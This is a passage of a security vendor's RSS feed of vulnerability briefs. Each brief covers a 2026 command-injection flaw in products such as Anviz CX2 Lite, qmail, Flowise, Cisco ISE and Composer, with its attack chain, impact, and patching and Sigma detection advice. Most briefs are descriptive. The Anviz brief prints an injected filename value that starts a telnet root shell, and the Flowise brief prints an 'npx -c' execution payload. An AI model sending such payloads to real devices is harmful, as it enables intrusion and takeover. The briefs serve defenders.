]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>dolibarr</category></item><item><title>Anviz CX2 Lite Authenticated Command Injection Vulnerability (CVE-2026-35682)</title><link>https://feed.craftedsignal.io/briefs/2026-04-anviz-command-injection/</link><pubDate>Fri, 17 Apr 2026 20:16:35 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-anviz-command-injection/</guid><description>Anviz CX2 Lite is vulnerable to an authenticated command injection via the filename parameter, leading to arbitrary command execution and root-level access.</description><content:encoded><![CDATA[<p>CVE-2026-35682 describes an authenticated command injection vulnerability in Anviz CX2 Lite devices. An attacker with valid user credentials can inject arbitrary commands into the filename parameter, leading to remote code execution with root privileges. The vulnerability allows an attacker to execute commands like starting telnetd, effectively gaining complete control over the device. This poses a significant risk to organizations using vulnerable Anviz CX2 Lite devices for access control or time attendance, potentially leading to unauthorized access, data breaches, or denial-of-service conditions. The ICS-CERT advisory, ICSA-26-106-03, provides additional details.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains valid credentials for an Anviz CX2 Lite device.</li>
<li>The attacker authenticates to the device&rsquo;s web interface or API.</li>
<li>The attacker identifies the vulnerable filename parameter in a specific request.</li>
<li>The attacker crafts a malicious request containing a command injection payload within the filename parameter (e.g., <code>filename=;telnetd -p 1337 -l /bin/sh;</code>).</li>
<li>The Anviz CX2 Lite device processes the request, improperly sanitizing the filename parameter.</li>
<li>The injected command executes with root privileges on the device.</li>
<li>The attacker uses the executed command to start a service like telnetd.</li>
<li>The attacker connects to the newly started service, gaining a root shell and complete control of the device.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-35682 allows a remote attacker to gain root-level access to the Anviz CX2 Lite device. This can lead to complete system compromise, including unauthorized access to sensitive data, modification of device settings, and potential use of the device as a foothold for further attacks within the network. Given that these devices are often used for physical access control, this vulnerability could lead to unauthorized physical access to secured areas.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches or firmware updates from Anviz to remediate CVE-2026-35682. Contact Anviz directly through their website for support and remediation steps (<a href="https://www.anviz.com/contact-us.html)">https://www.anviz.com/contact-us.html)</a>.</li>
<li>Deploy the Sigma rule <code>Detect Anviz CX2 Lite Command Injection Attempt</code> to identify exploitation attempts against the device.</li>
<li>Monitor web server logs for suspicious requests containing command injection payloads in the filename parameter to identify potential exploitation attempts.</li>
<li>Review authentication logs for unauthorized access attempts to the Anviz CX2 Lite devices.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>unauthorized-access</category><category>iot</category></item><item><title>Sagredo qmail Remote Code Execution Vulnerability (CVE-2026-41113)</title><link>https://feed.craftedsignal.io/briefs/2026-04-qmail-rce/</link><pubDate>Fri, 17 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-qmail-rce/</guid><description>A remote code execution vulnerability exists in Sagredo qmail versions prior to 2026.04.07 due to the use of `popen` in the `notlshosts_auto` function within `qmail-remote.c`, potentially leading to OS command injection.</description><content:encoded><![CDATA[<p>Sagredo qmail, a mail transfer agent (MTA), is vulnerable to a remote code execution (RCE) flaw, identified as CVE-2026-41113.  Specifically, versions prior to 2026.04.07 are affected. The vulnerability lies in the <code>notlshosts_auto</code> function within the <code>qmail-remote.c</code> file, where the <code>popen</code> function is used without proper sanitization, potentially allowing an attacker to inject and execute arbitrary OS commands. This vulnerability could be exploited by a remote attacker without requiring authentication, making it a critical security concern for organizations utilizing the affected qmail versions. Defenders should prioritize patching and consider implementing mitigations to prevent potential exploitation.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker sends an email to a target qmail server.</li>
<li>The qmail server receives the email and processes the recipient address.</li>
<li>During the delivery process, <code>qmail-remote.c</code> is invoked to handle remote delivery.</li>
<li>The <code>notlshosts_auto</code> function is called within <code>qmail-remote.c</code> to determine if TLS should be used for the connection.</li>
<li>The <code>notlshosts_auto</code> function executes the <code>popen</code> command with a crafted input string from the email, attempting to resolve hostnames.</li>
<li>The attacker injects malicious commands into the hostname string, which are then executed by <code>popen</code> on the server.</li>
<li>The attacker gains arbitrary code execution on the qmail server.</li>
<li>The attacker can then pivot to other systems within the network or exfiltrate sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-41113 allows a remote attacker to execute arbitrary code on the vulnerable qmail server. This could lead to complete system compromise, data breaches, or denial-of-service conditions. Organizations using vulnerable versions of qmail are at risk of losing control of their email infrastructure and potentially exposing sensitive information. While the number of actively exploited instances is currently unknown, the high CVSS score (8.1) underscores the severity and potential for widespread impact.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to Sagredo qmail version 2026.04.07 or later to patch CVE-2026-41113 (reference: <a href="https://github.com/sagredo-dev/qmail/releases/tag/v2026.04.07">https://github.com/sagredo-dev/qmail/releases/tag/v2026.04.07</a>).</li>
<li>Implement network segmentation to limit the impact of a successful compromise on the qmail server.</li>
<li>Monitor qmail server logs for suspicious activity, such as unusual process execution or network connections (enable process_creation and network_connection logging).</li>
<li>Deploy the Sigma rule &ldquo;Detect Suspicious Qmail Remote Execution via popen&rdquo; to identify potential exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>qmail</category><category>rce</category><category>command-injection</category><category>CVE-2026-41113</category></item><item><title>Flowise Authenticated Remote Code Execution via MCP Adapter</title><link>https://feed.craftedsignal.io/briefs/2026-04-flowise-rce/</link><pubDate>Fri, 17 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-flowise-rce/</guid><description>Flowise versions 3.0.13 and earlier are vulnerable to authenticated arbitrary command execution due to unsafe serialization of stdio commands in the MCP adapter, allowing a malicious user to execute commands on the underlying operating system.</description><content:encoded><![CDATA[<p>Flowise is an open-source low-code platform to build customized AI flow. Versions 3.0.13 and earlier contain a critical vulnerability that allows authenticated users to execute arbitrary commands on the underlying operating system. This vulnerability stems from insufficient input sanitization within the MCP (Model Composition Protocol) adapter. By adding a new MCP using stdio, an attacker can inject malicious commands, bypassing existing sanitization checks. Specifically, the vulnerability lies in the &ldquo;Custom MCP&rdquo; configuration where commands like &ldquo;npx&rdquo; can be combined with code execution arguments (e.g., &ldquo;npx -c touch /tmp/pwn&rdquo;), leading to direct code execution. This vulnerability affects both the <code>flowise</code> and <code>flowise-components</code> packages.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the Flowise application.</li>
<li>Attacker navigates to the Custom MCP configuration page (e.g., <code>/canvas</code>).</li>
<li>Attacker creates a new Custom MCP adapter.</li>
<li>Attacker configures the MCP adapter to use stdio.</li>
<li>Attacker injects a malicious command, such as &ldquo;npx -c touch /tmp/pwn&rdquo;, into the command or arguments fields. This bypasses <code>validateCommandInjection</code> and <code>validateArgsForLocalFileAccess</code> checks.</li>
<li>Flowise application executes the attacker-supplied command via the MCP adapter.</li>
<li>Malicious command is executed on the underlying operating system.</li>
<li>Attacker achieves arbitrary code execution on the server.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an authenticated attacker to achieve arbitrary command execution on the Flowise server. This could lead to complete system compromise, data theft, or denial of service. The vulnerability affects Flowise installations running versions 3.0.13 and earlier. The number of affected installations is currently unknown, but given the popularity of Flowise, the potential impact is significant.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Flowise and Flowise-components to a version greater than 3.0.13 to patch CVE-2026-40933.</li>
<li>Monitor process creation events for the execution of &ldquo;npx&rdquo; with the &ldquo;-c&rdquo; argument where the parent process is the Flowise application. Deploy the provided Sigma rule <code>Detect Flowise MCP Command Execution</code> to identify potential exploitation attempts.</li>
<li>Implement stricter input validation and sanitization measures within the MCP adapter configuration to prevent command injection attacks.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>flowise</category><category>rce</category><category>command-injection</category></item><item><title>Wavlink WL-WN530H4 OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-wavlink-command-injection/</link><pubDate>Fri, 17 Apr 2026 11:16:11 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-wavlink-command-injection/</guid><description>A remote command injection vulnerability exists in the Wavlink WL-WN530H4 router, specifically in the `strcat/snprintf` function of the `/cgi-bin/internet.cgi` file, allowing attackers to execute arbitrary OS commands.</description><content:encoded><![CDATA[<p>A critical OS command injection vulnerability, tracked as CVE-2026-6483, has been identified in Wavlink WL-WN530H4 routers running firmware version 20220721. The flaw resides within the <code>/cgi-bin/internet.cgi</code> file, specifically affecting the <code>strcat/snprintf</code> function. Successful exploitation enables remote attackers to execute arbitrary OS commands on the affected device.  The vulnerability is triggered by manipulating input to the vulnerable function. A public exploit is available, increasing the risk of widespread exploitation. Users are advised to upgrade to version 2026.04.16 to mitigate the risk. This vulnerability poses a significant threat due to the potential for complete system compromise, potentially leading to data exfiltration, device hijacking, or denial-of-service attacks.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a Wavlink WL-WN530H4 router running firmware version 20220721.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>/cgi-bin/internet.cgi</code> endpoint.</li>
<li>The crafted request includes a payload designed to exploit the <code>strcat/snprintf</code> function.</li>
<li>The vulnerable <code>strcat/snprintf</code> function fails to properly sanitize the attacker-controlled input.</li>
<li>The unsanitized input is passed to a system call, resulting in OS command injection.</li>
<li>The attacker executes arbitrary OS commands with the privileges of the web server process.</li>
<li>The attacker can leverage the compromised system to perform actions such as modifying router configuration, installing malware, or pivoting to other network devices.</li>
<li>The attacker gains persistent access and control over the router.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary OS commands on the affected Wavlink router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a launchpad for further attacks within the network. The lack of specifics regarding victimology suggests a wide potential impact affecting numerous users and potentially small businesses relying on these routers.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the Wavlink WL-WN530H4 router to firmware version 2026.04.16 to patch CVE-2026-6483.</li>
<li>Deploy the Sigma rule &ldquo;Detect Wavlink Command Injection Attempt&rdquo; to monitor for malicious requests targeting <code>/cgi-bin/internet.cgi</code>.</li>
<li>Monitor web server logs for suspicious activity and unauthorized access attempts following exploitation of CVE-2026-6483.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>router</category><category>cve-2026-6483</category></item><item><title>Dell PowerProtect Data Domain Command Injection Vulnerability (CVE-2026-23778)</title><link>https://feed.craftedsignal.io/briefs/2026-04-dell-powerprotect-cmd-injection/</link><pubDate>Fri, 17 Apr 2026 09:16:05 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-dell-powerprotect-cmd-injection/</guid><description>A command injection vulnerability in Dell PowerProtect Data Domain (CVE-2026-23778) could allow a remote, high-privileged attacker to gain root-level access.</description><content:encoded><![CDATA[<p>CVE-2026-23778 is a command injection vulnerability affecting Dell PowerProtect Data Domain appliances running Data Domain Operating System (DD OS). The affected versions include Feature Release versions 7.7.1.0 through 8.5, LTS2025 release version 8.3.1.0 through 8.3.1.20, and LTS2024 release versions 7.13.1.0 through 7.13.1.50. A remote attacker with high privileges could exploit this vulnerability to execute arbitrary commands with root privileges on the affected system. Successful exploitation would grant the attacker complete control over the Data Domain appliance, potentially leading to data loss, system compromise, and disruption of backup and recovery operations. Due to the critical role of Data Domain appliances in data protection, this vulnerability poses a significant risk to organizations using affected versions.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains high-privileged remote access to the Dell PowerProtect Data Domain appliance, likely through compromised credentials or a separate vulnerability.</li>
<li>The attacker crafts a malicious HTTP request containing a command injection payload targeting a vulnerable endpoint within the DD OS web management interface.</li>
<li>The vulnerable endpoint fails to properly sanitize user-supplied input, allowing the attacker to inject arbitrary operating system commands into the system.</li>
<li>The injected command is executed with the privileges of the webserver process, which in this case, runs with root privileges.</li>
<li>The attacker leverages the initial command execution to establish persistence on the system, such as creating a new user account or modifying system configuration files.</li>
<li>The attacker uses the gained root access to move laterally within the Data Domain appliance, potentially accessing sensitive data or compromising other services.</li>
<li>The attacker could exfiltrate sensitive data, deploy ransomware, or disrupt backup operations depending on their objectives.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-23778 grants a remote attacker complete control over the Dell PowerProtect Data Domain appliance. This can lead to severe consequences, including unauthorized access to sensitive data, data corruption, disruption of backup and recovery processes, and potential ransomware deployment. Given the Data Domain&rsquo;s central role in data protection strategies, a successful attack can have a widespread impact, affecting numerous systems and applications that rely on the backup infrastructure.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the security update provided by Dell to patch CVE-2026-23778. Refer to the Dell security advisory for specific instructions: <a href="https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities">https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities</a>.</li>
<li>Implement network segmentation to limit the blast radius of a potential compromise. Restrict network access to the Dell PowerProtect Data Domain appliance to only authorized users and systems.</li>
<li>Review user access controls and enforce the principle of least privilege. Ensure that users only have the necessary permissions to perform their job functions on the Data Domain appliance.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-23778</category><category>command-injection</category><category>dell</category><category>powerprotect</category></item><item><title>Multiple Critical Vulnerabilities in CISCO ISE Leading to Remote Code Execution</title><link>https://feed.craftedsignal.io/briefs/2026-04-cisco-ise-rce/</link><pubDate>Fri, 17 Apr 2026 08:45:05 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-cisco-ise-rce/</guid><description>Multiple critical vulnerabilities in CISCO ISE (CVE-2026-20186, CVE-2026-20147, CVE-2026-20180) allow remote attackers with low privileges to execute arbitrary commands, potentially escalating privileges to root and causing denial-of-service.</description><content:encoded><![CDATA[<p>Cisco Identity Services Engine (ISE) versions 3.x.x (3.1.0 - 3.4.0, and 3.1.0 p1-p10, 3.2.0 p1-p7, 3.3 Patches 1-7, and 3.4 Patches 1-3) are vulnerable to three newly disclosed vulnerabilities that can lead to remote code execution. These vulnerabilities, CVE-2026-20186, CVE-2026-20147, and CVE-2026-20180, can be exploited by remote attackers with low privileges, such as having Read Only Admin credentials. Successful exploitation can result in service disruption, system takeover, and complete compromise of the ISE instance. The vulnerabilities involve command injection and path traversal due to insufficient validation of user-supplied input in HTTP request handling. There is currently no public proof-of-concept or proof-of-exploitation available.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to CISCO ISE with low-privilege credentials (e.g., Read Only Admin).</li>
<li>Attacker crafts a malicious HTTP request targeting a vulnerable endpoint within the ISE web application.</li>
<li>The crafted request exploits CVE-2026-20186 by injecting commands to escalate privileges to root.</li>
<li>Alternatively, the attacker exploits CVE-2026-20147 by sending a crafted HTTP request to execute arbitrary commands on the underlying operating system.</li>
<li>As another option, the attacker leverages CVE-2026-20180 by exploiting insufficient validation of user-supplied input, leading to remote code execution.</li>
<li>The injected commands or executed code elevates the attacker&rsquo;s privileges to root.</li>
<li>The attacker gains full control over the ISE system, enabling them to modify configurations, access sensitive data, or install malicious software.</li>
<li>In single-node ISE deployments, successful exploitation can lead to a denial-of-service condition, disrupting network authentication and authorization services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities allows attackers to gain complete control over the CISCO ISE system. This can lead to the compromise of sensitive network access policies, credentials, and other confidential information managed by ISE. The impact includes potential disruption of network services due to denial-of-service, unauthorized access to network resources, and the potential for lateral movement to other systems within the network. Given that ISE is a critical component for network access control, a successful attack can have widespread and severe consequences.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately patch vulnerable CISCO ISE instances to the latest version to remediate CVE-2026-20186, CVE-2026-20147, and CVE-2026-20180 (Cisco Security Advisory).</li>
<li>Implement enhanced monitoring and detection capabilities to identify suspicious activity related to these vulnerabilities (CCB Recommendation).</li>
<li>Investigate and remediate any existing compromises by reviewing system logs and configurations for unauthorized changes (CCB Recommendation).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cisco-ise</category><category>rce</category><category>command-injection</category><category>path-traversal</category></item><item><title>Radare2 Command Injection Vulnerability (CVE-2026-41015)</title><link>https://feed.craftedsignal.io/briefs/2026-04-radare2-cmd-injection/</link><pubDate>Thu, 16 Apr 2026 03:16:27 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-radare2-cmd-injection/</guid><description>Radare2 before commit 9236f44, when configured on UNIX without SSL, is vulnerable to command injection via a PDB name passed to rabin2 -PP, potentially allowing arbitrary code execution.</description><content:encoded><![CDATA[<p>CVE-2026-41015 is a command injection vulnerability affecting radare2, a reverse engineering framework, when configured on UNIX systems without SSL. The vulnerability occurs in the <code>rabin2</code> utility, specifically when processing Program Database (PDB) files with the <code>-PP</code> option. An attacker can inject arbitrary commands into the PDB name, which are then executed by the system. This vulnerability exists within a specific commit range after version 6.1.2 and before 6.1.3 (commit 9236f44). While radare2 encourages users to use the latest git version, the short timeframe of the vulnerable code increases the risk for users who have not updated within that period. Exploitation could lead to complete system compromise if the radare2 process has sufficient privileges.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a vulnerable radare2 installation configured on a UNIX system without SSL.</li>
<li>Attacker crafts a malicious PDB file name containing embedded OS commands.</li>
<li>Attacker supplies the crafted PDB file name as input to the <code>rabin2 -PP</code> command.</li>
<li><code>rabin2</code> processes the PDB name without proper sanitization.</li>
<li>The embedded OS commands within the PDB name are executed by the system.</li>
<li>Attacker gains arbitrary code execution within the context of the radare2 process.</li>
<li>Attacker leverages the initial access to escalate privileges.</li>
<li>Attacker performs malicious actions such as data exfiltration, system compromise, or denial of service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-41015 allows an attacker to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, malware installation, or denial of service. The impact is particularly severe if radare2 is running with elevated privileges. The number of potential victims is dependent on the number of radare2 installations running vulnerable versions and configurations, but it is estimated to be relatively low due to the specific configuration requirements and the short lifespan of the vulnerable code in the git repository.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch from commit 9236f44 to remediate the command injection vulnerability in radare2.</li>
<li>Avoid configuring radare2 on UNIX systems without SSL to reduce the attack surface.</li>
<li>Deploy the Sigma rule <code>radare2-suspicious-rabin2-execution</code> to detect exploitation attempts involving the <code>rabin2</code> command.</li>
<li>Monitor process execution for <code>rabin2</code> with unusual command-line arguments as indicated by the rule <code>radare2-rabin2-pdb-injection</code>.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>radare2</category><category>command-injection</category><category>cve-2026-41015</category><category>linux</category></item><item><title>Fortinet FortiSandbox OS Command Injection Vulnerability (CVE-2026-39808)</title><link>https://feed.craftedsignal.io/briefs/2026-04-fortinet-os-command-injection/</link><pubDate>Wed, 15 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-fortinet-os-command-injection/</guid><description>Fortinet FortiSandbox versions 4.4.0 through 4.4.8 are vulnerable to OS Command Injection (CVE-2026-39808), potentially allowing unauthenticated attackers to execute arbitrary code or commands.</description><content:encoded><![CDATA[<p>Fortinet FortiSandbox versions 4.4.0 through 4.4.8 are susceptible to an OS Command Injection vulnerability identified as CVE-2026-39808. The vulnerability stems from an improper neutralization of special elements used in an OS command, potentially enabling attackers to inject and execute unauthorized code or commands on the affected system. The specifics of the attack vector are not detailed in the initial advisory. Successful exploitation could lead to complete system compromise, data theft, or denial-of-service conditions. Given the severity and potential for remote unauthenticated exploitation, this vulnerability poses a significant risk to organizations utilizing the affected FortiSandbox versions.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable FortiSandbox instance running a version between 4.4.0 and 4.4.8.</li>
<li>The attacker crafts a malicious HTTP request containing OS command injection payloads within a vulnerable parameter (specific vector unknown).</li>
<li>The FortiSandbox system processes the crafted request without proper sanitization or validation.</li>
<li>The injected OS command is executed by the underlying operating system with the privileges of the FortiSandbox application.</li>
<li>The attacker leverages the command execution to install a reverse shell or other remote access tool.</li>
<li>The attacker establishes a persistent connection to the compromised system.</li>
<li>The attacker performs reconnaissance on the internal network.</li>
<li>The attacker moves laterally to other systems, exfiltrates sensitive data, or deploys malicious software.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-39808 allows an unauthenticated attacker to execute arbitrary commands on the FortiSandbox appliance. This can lead to full system compromise, potentially enabling data exfiltration, installation of malware, or disruption of services. Given a CVSS score of 9.8, the vulnerability is considered critical. The lack of specific attack vector details in the initial advisory makes mitigation challenging without vendor patches or workarounds.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for suspicious requests targeting FortiSandbox instances (category: <code>webserver</code>, product: <code>linux</code>).</li>
<li>Apply available patches or upgrades from Fortinet to address CVE-2026-39808 as soon as they are released.</li>
<li>Inspect network traffic for unusual outbound connections originating from FortiSandbox appliances (category: <code>network_connection</code>, product: <code>linux</code>).</li>
<li>Deploy the provided Sigma rule to detect potential exploitation attempts based on common OS command injection patterns.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve</category><category>command-injection</category><category>fortinet</category></item><item><title>Composer Command Injection via Malicious Perforce Repository</title><link>https://feed.craftedsignal.io/briefs/2026-04-composer-command-injection/</link><pubDate>Wed, 15 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-composer-command-injection/</guid><description>Composer is vulnerable to command injection via a malicious Perforce repository due to improper escaping of user-supplied Perforce connection parameters, potentially leading to arbitrary command execution in the context of the user running Composer.</description><content:encoded><![CDATA[<p>Composer, a dependency manager for PHP, is susceptible to a command injection vulnerability (CVE-2026-40176) in versions 2.0.0 before 2.2.27 and versions 2.3.0 before 2.9.6. The vulnerability resides in the <code>Perforce::generateP4Command()</code> method, which improperly escapes user-supplied Perforce connection parameters (port, user, client) when constructing shell commands. This allows an attacker who controls a repository configuration, specifically within a malicious <code>composer.json</code> file declaring a Perforce VCS repository, to inject arbitrary commands. The injected commands are executed in the context of the user running Composer, even if Perforce is not installed. This vulnerability can be exploited if Composer is run on untrusted projects with attacker-supplied <code>composer.json</code> files.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious <code>composer.json</code> file.</li>
<li>The malicious <code>composer.json</code> declares a Perforce VCS repository.</li>
<li>The <code>composer.json</code> contains injected commands within the Perforce connection parameters (port, user, client).</li>
<li>A user unknowingly executes a Composer command (e.g., <code>composer install</code>) in a directory containing the malicious <code>composer.json</code>.</li>
<li>Composer parses the <code>composer.json</code> and calls the <code>Perforce::generateP4Command()</code> method.</li>
<li>The <code>Perforce::generateP4Command()</code> method constructs a shell command using the attacker-controlled, unescaped Perforce connection parameters.</li>
<li>Composer executes the injected command via <code>proc_open</code> or similar functions.</li>
<li>The attacker achieves arbitrary command execution in the context of the user running Composer, potentially leading to sensitive information disclosure, system compromise, or further malicious activities.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows attackers to execute arbitrary commands on the victim&rsquo;s system with the privileges of the user running Composer. This can lead to complete system compromise, data exfiltration, or denial of service. While the number of victims is currently unknown, any system running a vulnerable version of Composer and processing untrusted <code>composer.json</code> files is at risk. The primary attack vector involves tricking developers into running Composer on projects containing malicious <code>composer.json</code> files.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Composer to version 2.2.27 or 2.9.6 or later to patch CVE-2026-40176.</li>
<li>Carefully inspect <code>composer.json</code> files from untrusted sources before running Composer to verify Perforce-related fields contain valid values.</li>
<li>Deploy the Sigma rule to detect command execution with suspicious arguments when composer executes and tune for your environment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>composer</category><category>command-injection</category><category>php</category></item><item><title>CVE-2026-32183: Windows Snipping Tool Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-snipping-tool-command-injection/</link><pubDate>Tue, 14 Apr 2026 18:55:15 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-snipping-tool-command-injection/</guid><description>CVE-2026-32183 is a command injection vulnerability in the Windows Snipping Tool that allows a local attacker to execute arbitrary code.</description><content:encoded><![CDATA[<p>CVE-2026-32183 describes a command injection vulnerability affecting the Windows Snipping Tool. This vulnerability allows an attacker with local access to execute arbitrary code on a vulnerable system. The vulnerability stems from improper neutralization of special elements within commands processed by the Snipping Tool. While the specific attack vector is not detailed, the nature of command injection suggests that crafted input passed to the tool can be interpreted as commands, leading to unauthorized code execution. The vulnerability was reported on April 14, 2026, and further details can be found on the Microsoft Security Response Center website and the NVD entry for CVE-2026-32183. Exploitation requires user interaction.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains local access to a Windows system.</li>
<li>Attacker crafts a malicious payload containing special elements designed for command injection.</li>
<li>Attacker opens the Windows Snipping Tool.</li>
<li>Attacker provides the malicious payload to the Snipping Tool, potentially via file name, or other input fields.</li>
<li>The Snipping Tool processes the malicious payload without proper sanitization.</li>
<li>The injected command is executed within the context of the Snipping Tool process.</li>
<li>The attacker achieves arbitrary code execution on the system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-32183 allows a local attacker to execute arbitrary code with the privileges of the Snipping Tool process. This could lead to complete system compromise, data theft, or denial of service. The vulnerability requires user interaction, reducing its overall severity. The number of potential victims is high due to the widespread use of the Windows Snipping Tool.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the security update provided by Microsoft to address CVE-2026-32183, as referenced in the vulnerability details.</li>
<li>Monitor process execution for suspicious activity originating from the Snipping Tool (process_creation log source) after applying the patch.</li>
<li>Enable and review process creation logs (logsource: process_creation) for command line arguments containing suspicious characters or command injection attempts targeting the snipping tool executable.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>windows</category><category>vulnerability</category></item><item><title>UniFi Play Command Injection Vulnerability (CVE-2026-22563)</title><link>https://feed.craftedsignal.io/briefs/2026-04-unifi-command-injection/</link><pubDate>Mon, 13 Apr 2026 22:16:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-unifi-command-injection/</guid><description>A malicious actor with access to the UniFi Play network can exploit improper input validation vulnerabilities (CVE-2026-22563) in UniFi Play PowerAmp and Audio Port to inject commands, potentially leading to arbitrary code execution.</description><content:encoded><![CDATA[<p>CVE-2026-22563 describes a critical command injection vulnerability affecting UniFi Play PowerAmp (version 1.0.35 and earlier) and UniFi Play Audio Port (version 1.0.24 and earlier). The vulnerability stems from improper input validation, which allows an attacker with access to the UniFi Play network to inject arbitrary commands. Successful exploitation could lead to unauthorized access, system compromise, and potentially full control of the affected devices. This vulnerability was reported to HackerOne and assigned a CVSS v3.1 score of 9.8, indicating its severity. It is crucial for organizations using these UniFi Play devices to apply the recommended updates to mitigate this risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains access to the UniFi Play network (e.g., through compromised credentials or network vulnerabilities).</li>
<li>Attacker identifies a vulnerable UniFi Play PowerAmp or Audio Port device running an affected software version (1.0.35 or earlier for PowerAmp, 1.0.24 or earlier for Audio Port).</li>
<li>Attacker crafts a malicious payload containing an injected command.</li>
<li>Attacker sends the malicious payload to the vulnerable device through a network request, exploiting the improper input validation vulnerability (CVE-2026-22563).</li>
<li>The vulnerable device fails to properly sanitize the input, allowing the injected command to be executed by the underlying operating system.</li>
<li>The injected command executes with the privileges of the UniFi Play application, potentially allowing the attacker to perform actions such as reading sensitive data, modifying system configurations, or installing malicious software.</li>
<li>Attacker establishes a reverse shell to maintain persistent access to the compromised device.</li>
<li>Attacker pivots to other devices in the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-22563 can lead to full system compromise of UniFi Play PowerAmp and Audio Port devices. An attacker could gain unauthorized access to sensitive data, disrupt audio services, or use the compromised devices as a foothold to pivot to other systems on the network. Given the high CVSS score of 9.8, the impact is considered critical. The specific number of affected devices and sectors remains unknown, but organizations utilizing UniFi Play devices are at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately update UniFi Play PowerAmp to version 1.0.38 or later and UniFi Play Audio Port to version 1.1.9 or later to patch CVE-2026-22563.</li>
<li>Monitor network traffic for suspicious activity originating from UniFi Play devices.</li>
<li>Implement network segmentation to limit the potential impact of a compromised device.</li>
<li>Review and enforce strong password policies to prevent unauthorized network access.</li>
